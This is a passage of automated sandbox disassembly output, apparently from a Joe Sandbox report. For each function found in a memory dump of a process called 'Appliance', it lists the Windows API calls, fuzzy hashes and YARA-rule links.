Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4C8
Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E4C72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E4C785
RegCloseKey.ADVAPI32(00000000), ref: 00E4C7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E4C7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E4C853
RegCloseKey.ADVAPI32(?), ref: 00E4C85F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 0593d8edbd3ec73b3db55ad1d9a6d008de8406c4ab8bb16b6acd8364166cf812
Instruction ID: d8b52fe2dd3c572d414b55958c02bf4a6888913f0fed08e99c674edf915a5a5e
Opcode Fuzzy Hash: 0593d8edbd3ec73b3db55ad1d9a6d008de8406c4ab8bb16b6acd8364166cf812
Instruction Fuzzy Hash: 75819D30208341AFC754DF24D885E2ABBE5FF84318F14999DF4599B2A2DB31ED45CBA2

Function 00E2009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00E200A9
SysAllocString.OLEAUT32(00000000), ref: 00E20150
VariantCopy.OLEAUT32(00E20354,00000000), ref: 00E20179
VariantClear.OLEAUT32(00E20354), ref: 00E2019D
VariantCopy.OLEAUT32(00E20354,00000000), ref: 00E201A1
VariantClear.OLEAUT32(?), ref: 00E201AB

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: dc3fbec053c13aaaaf900b68121c935cda2dbd3d78f4445c42e570bafc57597c
Instruction ID: 809766fd142a283b488808d8cc895c4020b2d2335394cd99a5c0f275b85d5ac0
Opcode Fuzzy Hash: dc3fbec053c13aaaaf900b68121c935cda2dbd3d78f4445c42e570bafc57597c
Instruction Fuzzy Hash: 7E510D31500324EADF24AB65A889B69B3E5EF45310F24A847F905FF2E7DB709C44CB65

Function 00E39B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00DC41EA: _wcslen.LIBCMT ref: 00DC41EF

Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00E39F2A
_wcslen.LIBCMT ref: 00E39F4B
_wcslen.LIBCMT ref: 00E39F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00E39FCA

Strings

X, xrefs: 00E39E57

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 823c15d8d25e3c034123b94f698f77d9d4fe55a5968c7ca5918d191d6f89e00b
Instruction ID: ffa4f9118b96e0a915a7ebbaad3a7caef2098715a620c96cff053fb0b32487e1
Opcode Fuzzy Hash: 823c15d8d25e3c034123b94f698f77d9d4fe55a5968c7ca5918d191d6f89e00b
Instruction Fuzzy Hash: D7E18F316043419FC724EF25C885F6ABBE5EF84314F04896DF8899B2A2DB71DD45CBA2

Function 00E36ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E36F21
CoInitialize.OLE32(00000000), ref: 00E3707E
CoCreateInstance.OLE32(00E60CC4,00000000,00000001,00E60B34,?), ref: 00E37095
CoUninitialize.OLE32 ref: 00E37319

Strings

.lnk, xrefs: 00E36EFF, 00E36F69, 00E37025

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 1d0d4e376c2d15dcca0c76007ba190b811a7146641e5612ef5cbbd603e658601
Instruction ID: 0bb0d7778e62204f15625578861211f4a0e1ce6ffae8bbd9fcaa344d5ddb5339
Opcode Fuzzy Hash: 1d0d4e376c2d15dcca0c76007ba190b811a7146641e5612ef5cbbd603e658601
Instruction Fuzzy Hash: 00D14AB1508301AFC314EF24C881E6BB7E8FF98704F50495DF5969B252DB71E945CBA2

Function 00E31196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00E311B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00E311EE
EnterCriticalSection.KERNEL32(?), ref: 00E3120A
LeaveCriticalSection.KERNEL32(?), ref: 00E31283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00E3129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00E312C8

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: cc350ffdcc16d058fd75f9477a2cc9a996e02c16ca8f7a95770f33f7efb1e18f
Instruction ID: feca98123024615f78fc4716aa3508dd4966b13f2fa51c13207db2d92d01610b
Opcode Fuzzy Hash: cc350ffdcc16d058fd75f9477a2cc9a996e02c16ca8f7a95770f33f7efb1e18f
Instruction Fuzzy Hash: 4C414C71900205AFDF04AF55DC85AAABBB8FF04314F1444A9E904AE2A6DB70DE55DBB0

Function 00E58C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00E1FBEF,00000000,?,?,00000000,?,00E039E2,00000004,00000000,00000000), ref: 00E58CA7
EnableWindow.USER32(?,00000000), ref: 00E58CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00E58D2C
ShowWindow.USER32(?,00000004), ref: 00E58D40
EnableWindow.USER32(?,00000001), ref: 00E58D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00E58D8A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: f0b1fd0c9318e90d0fd0412667956b0362e986903a6951943815dbb675c46db3
Instruction ID: f4081d24957ea2ea897dfbe90a83929dad47755be5e3a014f70d58abee7bb25e
Opcode Fuzzy Hash: f0b1fd0c9318e90d0fd0412667956b0362e986903a6951943815dbb675c46db3
Instruction Fuzzy Hash: 8241EA30606244AFDB25DF25CA95FA57BF0FB4530AF1414AAED087B1B2CB31584DCB51

Function 00E42D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00E42D45

Part of subcall function 00E3EF33: GetWindowRect.USER32(?,?), ref: 00E3EF4B

GetDesktopWindow.USER32 ref: 00E42D6F
GetWindowRect.USER32(00000000), ref: 00E42D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00E42DB2
GetCursorPos.USER32(?), ref: 00E42DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E42E3C

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 7b0905e885c75e1ae809874cccefd44c591bafcc351eb667d76b5bc469efff8f
Instruction ID: 1f7390f28907b4dd89a2519297c5ad83d78b32cccee175ac368d3a0f0cc14058
Opcode Fuzzy Hash: 7b0905e885c75e1ae809874cccefd44c591bafcc351eb667d76b5bc469efff8f
Instruction Fuzzy Hash: 0231EF72909315AFC724DF149C49F9BB7A9FB84314F00092EF595A7181DB70E909CB92

Function 00E255E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00E255F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E25616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E2564E
_wcslen.LIBCMT ref: 00E2566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E25674
_wcsstr.LIBVCRUNTIME ref: 00E2567E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 17ec706dfc711943d0a44c7f023f501ab387880eedaad7f99569bb40a3b9b437
Instruction ID: 4c88325f42fbe6b1957cc0208e8ac6a88e5c299815d01a24553344e50464b476
Opcode Fuzzy Hash: 17ec706dfc711943d0a44c7f023f501ab387880eedaad7f99569bb40a3b9b437
Instruction Fuzzy Hash: 9B21F672204650BFEB266B36ED49E7B7BA8EF45750F14403AF805EA091EBB1DC419670

Function 00E36263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC55D1,?,?,00E04B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DC5871

_wcslen.LIBCMT ref: 00E362C0
CoInitialize.OLE32(00000000), ref: 00E363DA
CoCreateInstance.OLE32(00E60CC4,00000000,00000001,00E60B34,?), ref: 00E363F3
CoUninitialize.OLE32 ref: 00E36411

Strings

.lnk, xrefs: 00E362BB, 00E36306, 00E363CA

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: bcd86634a5e6801bdf964710daec4831731c96d36b097ad355b0939e4b37c41e
Instruction ID: 335dc280632582f1dcd0d04746fa5ffbaabeb028c731e4429b6553140b234340
Opcode Fuzzy Hash: bcd86634a5e6801bdf964710daec4831731c96d36b097ad355b0939e4b37c41e
Instruction Fuzzy Hash: 93D12571A04301AFC714DF25C484A2ABBE5FF89714F14995DF889AB361CB32EC45CBA2

Function 00DE36F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00DE36E9,00DE3355), ref: 00DE3700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DE370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DE3727
SetLastError.KERNEL32(00000000,?,00DE36E9,00DE3355), ref: 00DE3779

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5e4a63a9f485c1e36994d01caf7aedde57fda815123f9d58f2b86cea94c59c8c
Instruction ID: eb95429dd5055aa797c0a9c20a4ad366752843e8fbcbe9f018d4bc1470a6d240
Opcode Fuzzy Hash: 5e4a63a9f485c1e36994d01caf7aedde57fda815123f9d58f2b86cea94c59c8c
Instruction Fuzzy Hash: C701F5B254D3912EE62936B7AC8E97A3795EB04772B300229F114530F0EF518D065270

Function 00DF30E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00DE4D53,00000000,?,?,00DE68E2,?,?,00000000), ref: 00DF30EB
_free.LIBCMT ref: 00DF311E
_free.LIBCMT ref: 00DF3146
SetLastError.KERNEL32(00000000,?,00000000), ref: 00DF3153
SetLastError.KERNEL32(00000000,?,00000000), ref: 00DF315F
_abort.LIBCMT ref: 00DF3165

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 02265fd6c8c20ef79fbf33be38d69c64e30d4d93786fdeba56213ad989830f8f
Instruction ID: 3811b7c79b151928ee779923d5146cd452ced09e2a83f6d5a577207cc349b8b7
Opcode Fuzzy Hash: 02265fd6c8c20ef79fbf33be38d69c64e30d4d93786fdeba56213ad989830f8f
Instruction Fuzzy Hash: 2CF0A9755087086AC6262736AC0AA7F1659DFC1771B27C514FB18E22D1EF218E464171

Function 00E59480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00DC1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DC1F87
Part of subcall function 00DC1F2D: SelectObject.GDI32(?,00000000), ref: 00DC1F96
Part of subcall function 00DC1F2D: BeginPath.GDI32(?), ref: 00DC1FAD
Part of subcall function 00DC1F2D: SelectObject.GDI32(?,00000000), ref: 00DC1FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00E594AA
LineTo.GDI32(?,00000003,00000000), ref: 00E594BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00E594CC
LineTo.GDI32(?,00000000,00000003), ref: 00E594DC
EndPath.GDI32(?), ref: 00E594EC
StrokePath.GDI32(?), ref: 00E594FC

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 12137a95ecc7302083046c56aa043cb200de2ff9b56237a3cd24b9f1fc9fc3e0
Instruction ID: 79700d075c613d8f996a10a9bb3adaa384f1fd192c9f5d239ba7e10af097eb07
Opcode Fuzzy Hash: 12137a95ecc7302083046c56aa043cb200de2ff9b56237a3cd24b9f1fc9fc3e0
Instruction Fuzzy Hash: A1113976004209BFDF129F91DC88E9A7F6DEB08365F008416BA19AA1A1C771AD599BA0

Function 00E25B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00E25B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00E25B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E25B94
ReleaseDC.USER32(00000000,00000000), ref: 00E25B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E25BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E25BC5

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 1c42e3324b9e442aa84381ab21a03786a8c433bac315df0e0176350ad72f8f46
Instruction ID: c2e4f000bc4f14058e42655aa79d2c4f4e5ad15dde910cf2ff6b487df0488324
Opcode Fuzzy Hash: 1c42e3324b9e442aa84381ab21a03786a8c433bac315df0e0176350ad72f8f46
Instruction Fuzzy Hash: 09018475A00718BFEB149BA69D49F4E7FB8EB44352F004465FA05F7280D6709C05CF90

Function 00DC327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DC32AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 00DC32B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DC32C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DC32CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 00DC32D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DC32DD

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 3e57152cef25fdf822ee186b46ba854631041bcbdb61811067f9fb72e802caf0
Instruction ID: d5cdbb6edbc2aa123c0e065feec89d89dbeb093cc68738c1aa7680071e94a943
Opcode Fuzzy Hash: 3e57152cef25fdf822ee186b46ba854631041bcbdb61811067f9fb72e802caf0
Instruction Fuzzy Hash: DF016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5

Function 00E2F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E2F447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E2F45D
GetWindowThreadProcessId.USER32(?,?), ref: 00E2F46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E2F47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E2F485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E2F48C

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 6670a769ccb9db30a734aa3eb79b464c5f584648c4977151d1eae585dbac3793
Instruction ID: d51f69a95b2b374102289554988ffec3c0cbbe4607eab6c34ea8949ae984822f
Opcode Fuzzy Hash: 6670a769ccb9db30a734aa3eb79b464c5f584648c4977151d1eae585dbac3793
Instruction Fuzzy Hash: 5EF01D72245658BFE73557539C0EEEB3B7CEBC6B12F000459F601E109096A05A46C6B6

Function 00E034D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00E034EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00E03506
GetWindowDC.USER32(?), ref: 00E03512
GetPixel.GDI32(00000000,?,?), ref: 00E03521
ReleaseDC.USER32(?,00000000), ref: 00E03533
GetSysColor.USER32(00000005), ref: 00E0354D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: fdc9ef081321151175f1bac0c4623def5035d73038c355cc9932e4af98b3cd63
Instruction ID: 561a864458c6fe13672b0807ea5b39631e285784bc484c363fb135ec1f19771f
Opcode Fuzzy Hash: fdc9ef081321151175f1bac0c4623def5035d73038c355cc9932e4af98b3cd63
Instruction Fuzzy Hash: E7018631504205EFDB255FB2DC08FEA7BB5FB08322F100921FA1AB21A0CB311E86AB11

Function 00E221C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E221CC
UnloadUserProfile.USERENV(?,?), ref: 00E221D8
